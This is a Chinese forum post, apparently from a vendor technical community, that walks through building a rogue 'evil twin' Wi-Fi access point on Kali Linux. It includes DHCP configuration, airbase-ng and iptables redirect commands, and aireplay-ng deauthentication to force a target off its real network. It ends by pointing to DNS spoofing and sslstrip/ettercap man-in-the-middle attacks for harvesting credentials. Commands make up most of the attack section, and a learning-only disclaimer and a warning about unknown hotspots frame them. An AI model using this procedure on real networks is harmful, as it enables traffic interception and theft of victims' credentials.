【大白分享】渗透安全之伪造AP点位守株待兔
  

山东_朱文鑫 16111人觉得有帮助

{{ttag.title}}
大家好,我是大白,诚,乃信之本;无诚,何以言信?诚而有信,乃为人生。依旧感谢各位小伙伴的一路支持与陪伴。

今天继续分享大白的渗透安全之伪造AP点位守株待兔篇章,主要思路就是利用系统无线网卡伪造wifil然后进行后续渗透,同样还是对于好多小伙伴来说,这个更加偏向于安服,总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要,我们可以一同研习一下渗透攻防的“魅力”。

曾经315晚会现场演示利用虚假WiFi盗取晚会现场观众手机系统、品牌型号、自拍照片、邮箱帐号密码等各类隐私数据。


*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!

本篇就是做一下wifil的伪造进行接入验证。

1.无线网卡:无线网卡用于数据包的嗅探和注入。

2. Backtrack或者Kali Linux【个人习惯使用Kali Linux系统】

3.无线网络:确保该无线由用户使用,并且能控制这个无线接入点。

4.一个目标机器:使用虚拟机即可。

伪造热点部署过程:

第一步:

   启动虚拟机,选择kali linux 。点击”编辑虚拟机设置(Edit virtual machine settings)”,进入到“网络适配器(Network Adapter)”选项,在网络连接中选择“桥接(Bridged)”桥接到无线网卡上:


第二步:

   开启kali 用root账户登录。

第三步:

   打开终端,输入如下命令检查IP地址和网关。


第四步:

   先是用以下命令列出所有网卡列表,查看无线网卡是否被识别,如下图:


第五步:

   检查下用户附近的无线AP是否都可用,用如下命令,截图如下:

   airodump-ng 识别出来的无线网卡名称



这个命令后将会开始捕捉数据包,并且把用户附近的访问点列出来,其中BSSID是无线AP的MAC地址,Channel代表频率。注意PWR列的值,越靠近的路由器这个值越小。

第六步:

   记下AP点的BSSID 和Channel的值以及记下目标设备的MAC地址。

   在这个例子中,BISSID值是5E:F9:6A:29:28:18,Channel的值是2。目标机器的MAC地址是68:5D:43:7D:F7:E9

我们再建立一个假的DHCP服务器来提供一个假的AP接入点。在kali中执行以下命令就可以创建一个DHCP:

apt-get install isc-dhcp-server

   建立好后,修改DHCP配置文件,如下:

  1. leafpad /etc/dhcpd.conf

  2. authoraitative;

  3. default-lease-time 600;

  4. max-lease-time 7200;

  5. subnet 192.168.1.0 netmask 255.255.255.0 {

  6. option routers 192.168.1.1;

  7. option subnet-mask 255.255.255.0;

  8. option domain-name “Epson_Printer”;

  9. option domain-name-servers 192.168.1.1;

  10. range 192.168.1.2 192.168.1.40;

  11. }
复制代码

保存并关闭配置文件。

对/etc/dhcpd/dhcpd.conf文件重复上述操作。

第七步:

   打开终端,执行以下命令,创建一个ESSID名和受害者访问AP相似的AP接入点,例子中我们用“Epson_Printer”。

airbase-ng –e Epson_Printer -c 2 无线网卡名称

e 是AP接入点的ESSID(MAC地址)

c是无线网络的频率

现在,名叫“Epson_Printer”的新的AP接入点创建完成。



第八步:

   现在,我们打开一个新的终端,开始监控这个钓鱼AP,执行如下命令:

airodump-ng –bssid 00:C0:CA:70:8F:25 -C 2 无线网卡名称



第九步:

   检查第五步的产生的窗口,新建的AP接入点应该是可以看见的:


第十步:

   现在,我们必须向网络提供这个假的无线AP。打开终端,依次输入如下命令:

  1. ifconfig at0 192.168.1.1 netmask 255.255.255.0

  2. ifconfig at0 mtu 1400

  3. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

  4. iptables –flush

  5. iptables –table nat –flush

  6. iptables –delete-chain

  7. iptables –table nat –delete-chain

  8. echo 1 > /proc/sys/net/ipv4/ip_forward

  9. iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1(gateway)

  10. iptables -P FORWARD ACCEPT

  11. iptables –append FORWARD –in-interface at0 -j ACCEPT

  12. iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

  13. iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

  14. dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

  15. /etc/init.d/isc-dhcp-server start
复制代码


第十一步:

   我们可以等待别人连接这个假的无线AP,也可以用de-authenticate攻击强行迫使我们的目标重新连接AP,这样我们就能乘机抓包。

我们可以用以下命令来执行:

aireplay-ng –deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 网卡名称

5E:F9:6A:29:28:18 是无线AP的MAC地址

0 代表进行de-authentication.

-c 是目标机器的MAC地址

以下截图中可以看到,无线网卡正在发送de-authentication数据包给目标无线AP。目标机器就和“Epson_Printer” 连接点断开了,并且开始尝试重新连接,如下图:



第十二步:

   由于连续发送deauth包,客户端一直无法连接到原来的无线AP,于是就开始尝试连接其他最强的无线AP,我们的假AP信号很强,于是就开始连了。如下图:



第十三步:

   查看airodump-ng命令窗口。可以在终端中查看到连接的设备:


现在,受害者的设备已经连接到我们的假的无线AP中了。从600这里开始,攻击者可以施行各种手段,比如说DNS欺骗用户连接一个假的网站,获取到用户认证信息,或者用 sslstrip 和ettercap 进行中间人攻击。

*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!

以上就是本次的渗透安全之伪造AP点位守株待兔讲解分享,所以告诫大家不要随便连接陌生的无线热点,以及尽可能保证连接热点的准确性,感谢大佬们的参阅,此贴先到这里后续会带上更加实用的帖子,感谢大家!

励志分享超清壁纸语句~~:


勤能补拙是良训,一分耕耘一分才。--华罗庚

好的今天就到这里,老样子,感谢各位大神的参阅,孩子为了挣豆子不容易,孩子家里穷没豆子吃饭了!!!

打赏鼓励作者,期待更多好文!

打赏
4人已打赏

贺智文 发表于 2023-6-14 11:25
  
搬运网上人家的文章都不标明出处的嘛
飞翔的苹果 发表于 2023-6-15 08:14
  
楼主分享的案例很实用,具有典型性,希望有更多这样的干货供我们学习参考,非常感谢!
飞翔的苹果 发表于 2023-6-16 09:41
  
每天学习一点点,每天进步一点点。
新手719320 发表于 2023-6-20 11:18
  
逐句地看完这个帖子以后,我的心久久不能平静,震撼啊!为什么会有如此好的帖子!我纵横社区多年,自以为再也不会有任何帖子能打动我,没想到今天看到了如此精妙绝伦的这样一篇帖子。
策c 发表于 2023-6-23 10:09
  
楼主分享的案例很实用,具有典型性,希望有更多这样的干货供我们学习参考,非常感谢!
dhf 发表于 2023-8-29 10:24
  
每日打卡学习,感谢分享,学习了!!!
新手716814 发表于 2023-10-11 08:52
  
感谢分享,构建全联接的未来
新手716814 发表于 2023-10-17 09:06
  
感谢分享,学习学习!!!
发表新帖
热门标签
全部标签>
每日一问
技术盲盒
技术笔记
干货满满
技术咨询
产品连连看
新版本体验
功能体验
标准化排查
GIF动图学习
通用技术
自助服务平台操作指引
2023技术争霸赛专题
运维工具
信服课堂视频
秒懂零信任
技术晨报
用户认证
答题自测
深信服技术支持平台
安装部署配置
SDP百科
设备维护
社区帮助指南
每日一记
玩转零信任
畅聊IT
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
云计算知识
原创分享
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
功能咨询
终端接入
授权
资源访问
地址转换
虚拟机
存储
迁移
加速技术
排障笔记本
产品预警公告
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
每周精选

本版达人

新手68983...

本周分享达人

零和一网络

本周提问达人